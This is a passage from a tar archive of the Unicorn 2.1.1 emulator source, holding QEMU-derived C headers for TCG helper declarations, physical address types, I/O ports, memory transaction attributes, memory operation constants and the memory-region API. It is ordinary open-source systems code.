dh_arg_decl(t3, 3), dh_arg_decl(t4, 4)) \ { \ TCGTemp *args[4] = { dh_arg(t1, 1), dh_arg(t2, 2), \ dh_arg(t3, 3), dh_arg(t4, 4) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 4, args); \ } #define DEF_HELPER_FLAGS_5(name, flags, ret, t1, t2, t3, t4, t5) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3), \ dh_arg_decl(t4, 4), dh_arg_decl(t5, 5)) \ { \ TCGTemp *args[5] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3), \ dh_arg(t4, 4), dh_arg(t5, 5) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 5, args); \ } #define DEF_HELPER_FLAGS_6(name, flags, ret, t1, t2, t3, t4, t5, t6) \ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3), \ dh_arg_decl(t4, 4), dh_arg_decl(t5, 5), dh_arg_decl(t6, 6)) \ { \ TCGTemp *args[6] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3), \ dh_arg(t4, 4), dh_arg(t5, 5), dh_arg(t6, 6) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 6, args); \ } #define DEF_HELPER_FLAGS_7(name, flags, ret, t1, t2, t3, t4, t5, t6, t7)\ static inline void glue(gen_helper_, name)(TCGContext *tcg_ctx, dh_retvar_decl(ret) \ dh_arg_decl(t1, 1), dh_arg_decl(t2, 2), dh_arg_decl(t3, 3), \ dh_arg_decl(t4, 4), dh_arg_decl(t5, 5), dh_arg_decl(t6, 6), \ dh_arg_decl(t7, 7)) \ { \ TCGTemp *args[7] = { dh_arg(t1, 1), dh_arg(t2, 2), dh_arg(t3, 3), \ dh_arg(t4, 4), dh_arg(t5, 5), dh_arg(t6, 6), \ dh_arg(t7, 7) }; \ tcg_gen_callN(tcg_ctx, HELPER(name), dh_retvar(ret), 7, args); \ } #include "helper.h" #include "accel/tcg/tcg-runtime.h" #undef DEF_HELPER_FLAGS_0 #undef DEF_HELPER_FLAGS_1 #undef DEF_HELPER_FLAGS_2 #undef DEF_HELPER_FLAGS_3 #undef DEF_HELPER_FLAGS_4 #undef DEF_HELPER_FLAGS_5 #undef DEF_HELPER_FLAGS_6 #undef DEF_HELPER_FLAGS_7 #undef GEN_HELPER #endif /* HELPER_GEN_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/helper-head.h�������������������������������������������������������0000664�0000000�0000000�00000012357�14675241067�0021061�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Helper file for declaring TCG helper functions. Used by other helper files. Targets should use DEF_HELPER_N and DEF_HELPER_FLAGS_N to declare helper functions. Names should be specified without the helper_ prefix, and the return and argument types specified. 3 basic types are understood (i32, i64 and ptr). Additional aliases are provided for convenience and to match the types used by the C helper implementation. The target helper.h should be included in all files that use/define helper functions. THis will ensure that function prototypes are consistent. In addition it should be included an extra two times for helper.c, defining: GEN_HELPER 1 to produce op generation functions (gen_helper_*) GEN_HELPER 2 to do runtime registration helper functions. */ #ifndef EXEC_HELPER_HEAD_H #define EXEC_HELPER_HEAD_H #define HELPER(name) glue(helper_, name) /* Some types that make sense in C, but not for TCG. */ #define dh_alias_i32 i32 #define dh_alias_s32 i32 #define dh_alias_int i32 #define dh_alias_i64 i64 #define dh_alias_s64 i64 #define dh_alias_f16 i32 #define dh_alias_f32 i32 #define dh_alias_f64 i64 #define dh_alias_ptr ptr #define dh_alias_cptr ptr #define dh_alias_void void #define dh_alias_noreturn noreturn #define dh_alias(t) glue(dh_alias_, t) #define dh_ctype_i32 uint32_t #define dh_ctype_s32 int32_t #define dh_ctype_int int #define dh_ctype_i64 uint64_t #define dh_ctype_s64 int64_t #define dh_ctype_f16 uint32_t #define dh_ctype_f32 float32 #define dh_ctype_f64 float64 #define dh_ctype_ptr void * #define dh_ctype_cptr const void * #define dh_ctype_void void #define dh_ctype_noreturn void QEMU_NORETURN #define dh_ctype(t) dh_ctype_##t #ifdef NEED_CPU_H # ifdef TARGET_LONG_BITS # if TARGET_LONG_BITS == 32 # define dh_alias_tl i32 # else # define dh_alias_tl i64 # endif # endif # define dh_alias_env ptr # define dh_ctype_tl target_ulong # define dh_ctype_env CPUArchState * #endif /* We can't use glue() here because it falls foul of C preprocessor recursive expansion rules. */ #define dh_retvar_decl0_void void #define dh_retvar_decl0_noreturn void #define dh_retvar_decl0_i32 TCGv_i32 retval #define dh_retvar_decl0_i64 TCGv_i64 retval #define dh_retvar_decl0_ptr TCGv_ptr retval #define dh_retvar_decl0(t) glue(dh_retvar_decl0_, dh_alias(t)) #define dh_retvar_decl_void #define dh_retvar_decl_noreturn #define dh_retvar_decl_i32 TCGv_i32 retval, #define dh_retvar_decl_i64 TCGv_i64 retval, #define dh_retvar_decl_ptr TCGv_ptr retval, #define dh_retvar_decl(t) glue(dh_retvar_decl_, dh_alias(t)) #define dh_retvar_void NULL #define dh_retvar_noreturn NULL #define dh_retvar_i32 tcgv_i32_temp(tcg_ctx, retval) #define dh_retvar_i64 tcgv_i64_temp(tcg_ctx, retval) #define dh_retvar_ptr tcgv_ptr_temp(tcg_ctx, retval) #define dh_retvar(t) glue(dh_retvar_, dh_alias(t)) #define dh_is_64bit_void 0 #define dh_is_64bit_noreturn 0 #define dh_is_64bit_i32 0 #define dh_is_64bit_i64 1 #define dh_is_64bit_ptr (sizeof(void *) == 8) #define dh_is_64bit_cptr dh_is_64bit_ptr #define dh_is_64bit(t) glue(dh_is_64bit_, dh_alias(t)) #define dh_is_signed_void 0 #define dh_is_signed_noreturn 0 #define dh_is_signed_i32 0 #define dh_is_signed_s32 1 #define dh_is_signed_i64 0 #define dh_is_signed_s64 1 #define dh_is_signed_f16 0 #define dh_is_signed_f32 0 #define dh_is_signed_f64 0 #define dh_is_signed_tl 0 #define dh_is_signed_int 1 /* ??? This is highly specific to the host cpu. There are even special extension instructions that may be required, e.g. ia64's addp4. But for now we don't support any 64-bit targets with 32-bit pointers. */ #define dh_is_signed_ptr 0 #define dh_is_signed_cptr dh_is_signed_ptr #define dh_is_signed_env dh_is_signed_ptr #define dh_is_signed(t) dh_is_signed_##t #define dh_callflag_i32 0 #define dh_callflag_s32 0 #define dh_callflag_int 0 #define dh_callflag_i64 0 #define dh_callflag_s64 0 #define dh_callflag_f16 0 #define dh_callflag_f32 0 #define dh_callflag_f64 0 #define dh_callflag_ptr 0 #define dh_callflag_cptr dh_callflag_ptr #define dh_callflag_void 0 #define dh_callflag_noreturn TCG_CALL_NO_RETURN #define dh_callflag(t) glue(dh_callflag_, dh_alias(t)) #define dh_sizemask(t, n) \ ((dh_is_64bit(t) << (n*2)) | (dh_is_signed(t) << (n*2+1))) #define dh_arg(t, n) \ glue(glue(tcgv_, dh_alias(t)), _temp)(tcg_ctx, glue(arg, n)) #define dh_arg_decl(t, n) glue(TCGv_, dh_alias(t)) glue(arg, n) #define DEF_HELPER_0(name, ret) \ DEF_HELPER_FLAGS_0(name, 0, ret) #define DEF_HELPER_1(name, ret, t1) \ DEF_HELPER_FLAGS_1(name, 0, ret, t1) #define DEF_HELPER_2(name, ret, t1, t2) \ DEF_HELPER_FLAGS_2(name, 0, ret, t1, t2) #define DEF_HELPER_3(name, ret, t1, t2, t3) \ DEF_HELPER_FLAGS_3(name, 0, ret, t1, t2, t3) #define DEF_HELPER_4(name, ret, t1, t2, t3, t4) \ DEF_HELPER_FLAGS_4(name, 0, ret, t1, t2, t3, t4) #define DEF_HELPER_5(name, ret, t1, t2, t3, t4, t5) \ DEF_HELPER_FLAGS_5(name, 0, ret, t1, t2, t3, t4, t5) #define DEF_HELPER_6(name, ret, t1, t2, t3, t4, t5, t6) \ DEF_HELPER_FLAGS_6(name, 0, ret, t1, t2, t3, t4, t5, t6) #define DEF_HELPER_7(name, ret, t1, t2, t3, t4, t5, t6, t7) \ DEF_HELPER_FLAGS_7(name, 0, ret, t1, t2, t3, t4, t5, t6, t7) /* MAX_OPC_PARAM_IARGS must be set to n if last entry is DEF_HELPER_FLAGS_n. */ #endif /* EXEC_HELPER_HEAD_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/helper-proto.h������������������������������������������������������0000664�0000000�0000000�00000003347�14675241067�0021322�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Helper file for declaring TCG helper functions. This one expands prototypes for the helper functions. */ #ifndef HELPER_PROTO_H #define HELPER_PROTO_H #include "exec/helper-head.h" #define DEF_HELPER_FLAGS_0(name, flags, ret) \ dh_ctype(ret) HELPER(name) (void); #define DEF_HELPER_FLAGS_1(name, flags, ret, t1) \ dh_ctype(ret) HELPER(name) (dh_ctype(t1)); #define DEF_HELPER_FLAGS_2(name, flags, ret, t1, t2) \ dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2)); #define DEF_HELPER_FLAGS_3(name, flags, ret, t1, t2, t3) \ dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3)); #define DEF_HELPER_FLAGS_4(name, flags, ret, t1, t2, t3, t4) \ dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \ dh_ctype(t4)); #define DEF_HELPER_FLAGS_5(name, flags, ret, t1, t2, t3, t4, t5) \ dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \ dh_ctype(t4), dh_ctype(t5)); #define DEF_HELPER_FLAGS_6(name, flags, ret, t1, t2, t3, t4, t5, t6) \ dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \ dh_ctype(t4), dh_ctype(t5), dh_ctype(t6)); #define DEF_HELPER_FLAGS_7(name, flags, ret, t1, t2, t3, t4, t5, t6, t7) \ dh_ctype(ret) HELPER(name) (dh_ctype(t1), dh_ctype(t2), dh_ctype(t3), \ dh_ctype(t4), dh_ctype(t5), dh_ctype(t6), \ dh_ctype(t7)); #include "helper.h" #include "accel/tcg/tcg-runtime.h" #undef DEF_HELPER_FLAGS_0 #undef DEF_HELPER_FLAGS_1 #undef DEF_HELPER_FLAGS_2 #undef DEF_HELPER_FLAGS_3 #undef DEF_HELPER_FLAGS_4 #undef DEF_HELPER_FLAGS_5 #undef DEF_HELPER_FLAGS_6 #undef DEF_HELPER_FLAGS_7 #endif /* HELPER_PROTO_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/helper-tcg.h��������������������������������������������������������0000664�0000000�0000000�00000005264�14675241067�0020734�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Helper file for declaring TCG helper functions. This one defines data structures private to tcg.c. */ #ifndef HELPER_TCG_H #define HELPER_TCG_H #include "exec/helper-head.h" /* Need one more level of indirection before stringification to get all the macros expanded first. */ #define str(s) #s #define DEF_HELPER_FLAGS_0(NAME, FLAGS, ret) \ { .func = HELPER(NAME), .name = str(NAME), \ .flags = FLAGS | dh_callflag(ret), \ .sizemask = dh_sizemask(ret, 0) }, #define DEF_HELPER_FLAGS_1(NAME, FLAGS, ret, t1) \ { .func = HELPER(NAME), .name = str(NAME), \ .flags = FLAGS | dh_callflag(ret), \ .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) }, #define DEF_HELPER_FLAGS_2(NAME, FLAGS, ret, t1, t2) \ { .func = HELPER(NAME), .name = str(NAME), \ .flags = FLAGS | dh_callflag(ret), \ .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ | dh_sizemask(t2, 2) }, #define DEF_HELPER_FLAGS_3(NAME, FLAGS, ret, t1, t2, t3) \ { .func = HELPER(NAME), .name = str(NAME), \ .flags = FLAGS | dh_callflag(ret), \ .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) }, #define DEF_HELPER_FLAGS_4(NAME, FLAGS, ret, t1, t2, t3, t4) \ { .func = HELPER(NAME), .name = str(NAME), \ .flags = FLAGS | dh_callflag(ret), \ .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) }, #define DEF_HELPER_FLAGS_5(NAME, FLAGS, ret, t1, t2, t3, t4, t5) \ { .func = HELPER(NAME), .name = str(NAME), \ .flags = FLAGS | dh_callflag(ret), \ .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) \ | dh_sizemask(t5, 5) }, #define DEF_HELPER_FLAGS_6(NAME, FLAGS, ret, t1, t2, t3, t4, t5, t6) \ { .func = HELPER(NAME), .name = str(NAME), \ .flags = FLAGS | dh_callflag(ret), \ .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) \ | dh_sizemask(t5, 5) | dh_sizemask(t6, 6) }, #define DEF_HELPER_FLAGS_7(NAME, FLAGS, ret, t1, t2, t3, t4, t5, t6, t7) \ { .func = HELPER(NAME), .name = str(NAME), .flags = FLAGS, \ .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \ | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) \ | dh_sizemask(t5, 5) | dh_sizemask(t6, 6) | dh_sizemask(t7, 7) }, #include "helper.h" #include "accel/tcg/tcg-runtime.h" #undef str #undef DEF_HELPER_FLAGS_0 #undef DEF_HELPER_FLAGS_1 #undef DEF_HELPER_FLAGS_2 #undef DEF_HELPER_FLAGS_3 #undef DEF_HELPER_FLAGS_4 #undef DEF_HELPER_FLAGS_5 #undef DEF_HELPER_FLAGS_6 #undef DEF_HELPER_FLAGS_7 #endif /* HELPER_TCG_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/hwaddr.h������������������������������������������������������������0000664�0000000�0000000�00000000712�14675241067�0020144�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Define hwaddr if it exists. */ #ifndef HWADDR_H #define HWADDR_H #define HWADDR_BITS 64 /* hwaddr is the type of a physical address (its size can be different from 'target_ulong'). */ typedef uint64_t hwaddr; #define HWADDR_MAX UINT64_MAX #define TARGET_FMT_plx "%016" PRIx64 #define HWADDR_PRId PRId64 #define HWADDR_PRIi PRIi64 #define HWADDR_PRIo PRIo64 #define HWADDR_PRIu PRIu64 #define HWADDR_PRIx PRIx64 #define HWADDR_PRIX PRIX64 #endif ������������������������������������������������������unicorn-2.1.1/qemu/include/exec/ioport.h������������������������������������������������������������0000664�0000000�0000000�00000004370�14675241067�0020213�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * defines ioport related functions * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /************************************************************************** * IO ports API */ #ifndef IOPORT_H #define IOPORT_H #include "exec/memory.h" #define MAX_IOPORTS (64 * 1024) #define IOPORTS_MASK (MAX_IOPORTS - 1) typedef struct MemoryRegionPortio { uint32_t offset; uint32_t len; unsigned size; uint32_t (*read)(void *opaque, uint32_t address); void (*write)(void *opaque, uint32_t address, uint32_t data); uint32_t base; /* private field */ } MemoryRegionPortio; #define PORTIO_END_OF_LIST() { } void cpu_outb(struct uc_struct *uc, uint32_t addr, uint8_t val); void cpu_outw(struct uc_struct *uc, uint32_t addr, uint16_t val); void cpu_outl(struct uc_struct *uc, uint32_t addr, uint32_t val); uint8_t cpu_inb(struct uc_struct *uc, uint32_t addr); uint16_t cpu_inw(struct uc_struct *uc, uint32_t addr); uint32_t cpu_inl(struct uc_struct *uc, uint32_t addr); typedef struct PortioList { const struct MemoryRegionPortio *ports; struct MemoryRegion *address_space; unsigned nr; struct MemoryRegion **regions; void *opaque; const char *name; } PortioList; void portio_list_init(PortioList *piolist, const struct MemoryRegionPortio *callbacks, void *opaque, const char *name); void portio_list_destroy(PortioList *piolist); void portio_list_add(PortioList *piolist, struct MemoryRegion *address_space, uint32_t addr); void portio_list_del(PortioList *piolist); #endif /* IOPORT_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/memattrs.h����������������������������������������������������������0000664�0000000�0000000�00000005160�14675241067�0020531�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Memory transaction attributes * * Copyright (c) 2015 Linaro Limited. * * Authors: * Peter Maydell <peter.maydell@linaro.org> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #ifndef MEMATTRS_H #define MEMATTRS_H /* Every memory transaction has associated with it a set of * attributes. Some of these are generic (such as the ID of * the bus master); some are specific to a particular kind of * bus (such as the ARM Secure/NonSecure bit). We define them * all as non-overlapping bitfields in a single struct to avoid * confusion if different parts of QEMU used the same bit for * different semantics. */ typedef struct MemTxAttrs { /* Bus masters which don't specify any attributes will get this * (via the MEMTXATTRS_UNSPECIFIED constant), so that we can * distinguish "all attributes deliberately clear" from * "didn't specify" if necessary. */ unsigned int unspecified:1; /* ARM/AMBA: TrustZone Secure access * x86: System Management Mode access */ unsigned int secure:1; /* Memory access is usermode (unprivileged) */ unsigned int user:1; /* Requester ID (for MSI for example) */ unsigned int requester_id:16; /* Invert endianness for this page */ unsigned int byte_swap:1; /* * The following are target-specific page-table bits. These are not * related to actual memory transactions at all. However, this structure * is part of the tlb_fill interface, cached in the cputlb structure, * and has unused bits. These fields will be read by target-specific * helpers using env->iotlb[mmu_idx][tlb_index()].attrs.target_tlb_bitN. */ unsigned int target_tlb_bit0 : 1; unsigned int target_tlb_bit1 : 1; unsigned int target_tlb_bit2 : 1; } MemTxAttrs; /* Bus masters which don't specify any attributes will get this, * which has all attribute bits clear except the topmost one * (so that we can distinguish "all attributes deliberately clear" * from "didn't specify" if necessary). */ #define MEMTXATTRS_UNSPECIFIED ((MemTxAttrs) { .unspecified = 1 }) /* New-style MMIO accessors can indicate that the transaction failed. * A zero (MEMTX_OK) response means success; anything else is a failure * of some kind. The memory subsystem will bitwise-OR together results * if it is synthesizing an operation from multiple smaller accesses. */ #define MEMTX_OK 0 #define MEMTX_ERROR (1U << 0) /* device returned an error */ #define MEMTX_DECODE_ERROR (1U << 1) /* nothing at that address */ typedef uint32_t MemTxResult; #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/memop.h�������������������������������������������������������������0000664�0000000�0000000�00000006435�14675241067�0020020�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Constants for memory operations * * Authors: * Richard Henderson <rth@twiddle.net> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #ifndef MEMOP_H #define MEMOP_H #include "qemu/host-utils.h" typedef enum MemOp { MO_8 = 0, MO_16 = 1, MO_32 = 2, MO_64 = 3, MO_SIZE = 3, /* Mask for the above. */ MO_SIGN = 4, /* Sign-extended, otherwise zero-extended. */ MO_BSWAP = 8, /* Host reverse endian. */ #ifdef HOST_WORDS_BIGENDIAN MO_LE = MO_BSWAP, MO_BE = 0, #else MO_LE = 0, MO_BE = MO_BSWAP, #endif #ifdef NEED_CPU_H #ifdef TARGET_WORDS_BIGENDIAN MO_TE = MO_BE, #else MO_TE = MO_LE, #endif #endif /* * MO_UNALN accesses are never checked for alignment. * MO_ALIGN accesses will result in a call to the CPU's * do_unaligned_access hook if the guest address is not aligned. * The default depends on whether the target CPU defines * TARGET_ALIGNED_ONLY. * * Some architectures (e.g. ARMv8) need the address which is aligned * to a size more than the size of the memory access. * Some architectures (e.g. SPARCv9) need an address which is aligned, * but less strictly than the natural alignment. * * MO_ALIGN supposes the alignment size is the size of a memory access. * * There are three options: * - unaligned access permitted (MO_UNALN). * - an alignment to the size of an access (MO_ALIGN); * - an alignment to a specified size, which may be more or less than * the access size (MO_ALIGN_x where 'x' is a size in bytes); */ MO_ASHIFT = 4, MO_AMASK = 7 << MO_ASHIFT, #ifdef NEED_CPU_H #ifdef TARGET_ALIGNED_ONLY MO_ALIGN = 0, MO_UNALN = MO_AMASK, #else MO_ALIGN = MO_AMASK, MO_UNALN = 0, #endif #endif MO_ALIGN_2 = 1 << MO_ASHIFT, MO_ALIGN_4 = 2 << MO_ASHIFT, MO_ALIGN_8 = 3 << MO_ASHIFT, MO_ALIGN_16 = 4 << MO_ASHIFT, MO_ALIGN_32 = 5 << MO_ASHIFT, MO_ALIGN_64 = 6 << MO_ASHIFT, /* Combinations of the above, for ease of use. */ MO_UB = MO_8, MO_UW = MO_16, MO_UL = MO_32, MO_SB = MO_SIGN | MO_8, MO_SW = MO_SIGN | MO_16, MO_SL = MO_SIGN | MO_32, MO_Q = MO_64, MO_LEUW = MO_LE | MO_UW, MO_LEUL = MO_LE | MO_UL, MO_LESW = MO_LE | MO_SW, MO_LESL = MO_LE | MO_SL, MO_LEQ = MO_LE | MO_Q, MO_BEUW = MO_BE | MO_UW, MO_BEUL = MO_BE | MO_UL, MO_BESW = MO_BE | MO_SW, MO_BESL = MO_BE | MO_SL, MO_BEQ = MO_BE | MO_Q, #ifdef NEED_CPU_H MO_TEUW = MO_TE | MO_UW, MO_TEUL = MO_TE | MO_UL, MO_TESW = MO_TE | MO_SW, MO_TESL = MO_TE | MO_SL, MO_TEQ = MO_TE | MO_Q, #endif MO_SSIZE = MO_SIZE | MO_SIGN, } MemOp; /* MemOp to size in bytes. */ static inline unsigned memop_size(MemOp op) { return 1 << (op & MO_SIZE); } /* Size in bytes to MemOp. */ static inline MemOp size_memop(unsigned size) { #ifdef CONFIG_DEBUG_TCG /* Power of 2 up to 8. */ assert((size & (size - 1)) == 0 && size >= 1 && size <= 8); #endif return ctz32(size); } /* Big endianness from MemOp. */ static inline bool memop_big_endian(MemOp op) { return (op & MO_BSWAP) == MO_BE; } #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/memory-internal.h���������������������������������������������������0000664�0000000�0000000�00000003127�14675241067�0022020�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Declarations for functions which are internal to the memory subsystem. * * Copyright 2011 Red Hat, Inc. and/or its affiliates * * Authors: * Avi Kivity <avi@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or * later. See the COPYING file in the top-level directory. * */ /* * This header is for use by exec.c, memory.c and accel/tcg/cputlb.c ONLY, * for declarations which are shared between the memory subsystem's * internals and the TCG TLB code. Do not include it from elsewhere. */ #ifndef MEMORY_INTERNAL_H #define MEMORY_INTERNAL_H #include "cpu.h" static inline AddressSpaceDispatch *flatview_to_dispatch(FlatView *fv) { return fv->dispatch; } static inline AddressSpaceDispatch *address_space_to_dispatch(AddressSpace *as) { return flatview_to_dispatch(address_space_to_flatview(as)); } FlatView *address_space_get_flatview(AddressSpace *as); void flatview_unref(FlatView *view); extern const MemoryRegionOps unassigned_mem_ops; bool memory_region_access_valid(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs); void flatview_add_to_dispatch(struct uc_struct *uc, FlatView *fv, MemoryRegionSection *section); AddressSpaceDispatch *address_space_dispatch_new(struct uc_struct *uc, FlatView *fv); void address_space_dispatch_compact(AddressSpaceDispatch *d); void address_space_dispatch_free(AddressSpaceDispatch *d); void mtree_print_dispatch(struct AddressSpaceDispatch *d, MemoryRegion *root); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/exec/memory.h������������������������������������������������������������0000664�0000000�0000000�00000125052�14675241067�0020210�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Physical memory management API * * Copyright 2011 Red Hat, Inc. and/or its affiliates * * Authors: * Avi Kivity <avi@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2. See * the COPYING file in the top-level directory. * */ #ifndef MEMORY_H #define MEMORY_H #include "exec/cpu-common.h" #include "exec/hwaddr.h" #include "exec/memattrs.h" #include "exec/memop.h" #include "exec/ramlist.h" #include "qemu/bswap.h" #include "qemu/queue.h" #include "qemu/int128.h" #define RAM_ADDR_INVALID (~(ram_addr_t)0) #define MAX_PHYS_ADDR_SPACE_BITS 62 #define MAX_PHYS_ADDR (((hwaddr)1 << MAX_PHYS_ADDR_SPACE_BITS) - 1) typedef struct MemoryRegionOps MemoryRegionOps; typedef struct IOMMUTLBEntry IOMMUTLBEntry; typedef uint64_t (*uc_cb_mmio_read_t)(struct uc_struct *uc, uint64_t addr, unsigned size, void *user_data); typedef void (*uc_cb_mmio_write_t)(struct uc_struct *uc, uint64_t addr, unsigned size, uint64_t data, void *user_data); /* See address_space_translate: bit 0 is read, bit 1 is write. */ typedef enum { IOMMU_NONE = 0, IOMMU_RO = 1, IOMMU_WO = 2, IOMMU_RW = 3, } IOMMUAccessFlags; #define IOMMU_ACCESS_FLAG(r, w) (((r) ? IOMMU_RO : 0) | ((w) ? IOMMU_WO : 0)) struct IOMMUTLBEntry { AddressSpace *target_as; hwaddr iova; hwaddr translated_addr; hwaddr addr_mask; /* 0xfff = 4k translation */ IOMMUAccessFlags perm; }; /* * Bitmap for different IOMMUNotifier capabilities. Each notifier can * register with one or multiple IOMMU Notifier capability bit(s). */ typedef enum { IOMMU_NOTIFIER_NONE = 0, /* Notify cache invalidations */ IOMMU_NOTIFIER_UNMAP = 0x1, /* Notify entry changes (newly created entries) */ IOMMU_NOTIFIER_MAP = 0x2, } IOMMUNotifierFlag; #define IOMMU_NOTIFIER_ALL (IOMMU_NOTIFIER_MAP | IOMMU_NOTIFIER_UNMAP) struct IOMMUNotifier; typedef void (*IOMMUNotify)(struct IOMMUNotifier *notifier, IOMMUTLBEntry *data); struct IOMMUNotifier { IOMMUNotify notify; IOMMUNotifierFlag notifier_flags; /* Notify for address space range start <= addr <= end */ hwaddr start; hwaddr end; int iommu_idx; QLIST_ENTRY(IOMMUNotifier) node; }; typedef struct IOMMUNotifier IOMMUNotifier; /* RAM is pre-allocated and passed into qemu_ram_alloc_from_ptr */ #define RAM_PREALLOC (1 << 0) /* RAM is mmap-ed with MAP_SHARED */ #define RAM_SHARED (1 << 1) /* Only a portion of RAM (used_length) is actually used, and migrated. * This used_length size can change across reboots. */ #define RAM_RESIZEABLE (1 << 2) /* UFFDIO_ZEROPAGE is available on this RAMBlock to atomically * zero the page and wake waiting processes. * (Set during postcopy) */ #define RAM_UF_ZEROPAGE (1 << 3) /* RAM can be migrated */ #define RAM_MIGRATABLE (1 << 4) /* RAM is a persistent kind memory */ #define RAM_PMEM (1 << 5) static inline void iommu_notifier_init(IOMMUNotifier *n, IOMMUNotify fn, IOMMUNotifierFlag flags, hwaddr start, hwaddr end, int iommu_idx) { n->notify = fn; n->notifier_flags = flags; n->start = start; n->end = end; n->iommu_idx = iommu_idx; } /* * Memory region callbacks */ struct MemoryRegionOps { /* Read from the memory region. @addr is relative to @mr; @size is * in bytes. */ uint64_t (*read)(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned size); /* Write to the memory region. @addr is relative to @mr; @size is * in bytes. */ void (*write)(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t data, unsigned size); MemTxResult (*read_with_attrs)(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t *data, unsigned size, MemTxAttrs attrs); MemTxResult (*write_with_attrs)(struct uc_struct *, void *opaque, hwaddr addr, uint64_t data, unsigned size, MemTxAttrs attrs); enum device_endian endianness; /* Guest-visible constraints: */ struct { /* If nonzero, specify bounds on access sizes beyond which a machine * check is thrown. */ unsigned min_access_size; unsigned max_access_size; /* If true, unaligned accesses are supported. Otherwise unaligned * accesses throw machine checks. */ bool unaligned; /* * If present, and returns #false, the transaction is not accepted * by the device (and results in machine dependent behaviour such * as a machine check exception). */ bool (*accepts)(struct uc_struct *uc, void *opaque, 